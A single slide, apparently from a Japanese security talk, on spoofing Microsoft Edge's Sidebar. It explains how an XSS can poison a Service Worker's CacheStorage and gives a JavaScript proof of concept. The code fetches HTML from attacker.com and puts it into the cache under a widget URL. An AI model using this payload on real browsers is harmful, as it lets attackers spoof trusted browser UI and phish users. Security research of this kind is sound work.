Slide 12
Slide 12 text
Edge Sidebarの偽装
Service WorkerがあるならCacheStorageを汚染してXSSからSidebar偽装まででき
る。
caches.open('homepage-base-V1').then(async (cache) => {
let html = await fetch('https://attacker.com/spoof_page').then(r=>r.text());
let init = { headers: { 'Content-Type': 'text/html' } };
cache.put('/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&
sharedHeader=1', new Response(html, init));
});